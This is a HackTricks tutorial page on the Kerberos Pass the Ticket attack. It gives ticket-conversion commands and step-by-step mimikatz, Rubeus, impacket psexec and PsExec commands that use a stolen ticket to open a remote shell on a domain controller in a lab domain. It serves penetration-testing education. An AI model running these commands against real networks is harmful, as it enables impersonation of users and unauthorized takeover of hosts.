HackTricks
Search…
⌃K

Pass the Ticket

Support HackTricks and get benefits!
Security Skills as a Service platform bridges the current skill set gap by combining global offensive security talent with smart automation, providing real-time data you need to make informed decisions.

Pass The Ticket (PTT)

This kind of attack is similar to Pass the Key, but instead of using hashes to request a ticket, the ticket itself is stolen and used to authenticate as its owner.
Read:

Swaping Linux and Windows tickets between platforms

The ticket_converter script. The only needed parameters are the current ticket and the output file, it automatically detects the input ticket file format and converts it. For example:
[email protected]:ticket_converter# python ticket_converter.py velociraptor.ccache velociraptor.kirbi
Converting ccache => kirbi
[email protected]:ticket_converter# python ticket_converter.py velociraptor.kirbi velociraptor.ccache
Converting kirbi => ccache
Kekeo, to convert them in Windows. This tool was not checked due to requiring a license in their ASN1 library, but I think it is worth mentioning.

Pass The Ticket Attack

Linux
export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK
python psexec.py jurassic.park/[email protected] -k -no-pass
Windows
#Load the ticket in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt [0;28419fe][email protected]"
.\Rubeus.exe ptt /ticket:[0;28419fe][email protected]
klist #List tickets in cache to cehck that mimikatz has loaded the ticket
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd

References

Security Skills as a Service platform bridges the current skill set gap by combining global offensive security talent with smart automation, providing real-time data you need to make informed decisions.
Support HackTricks and get benefits!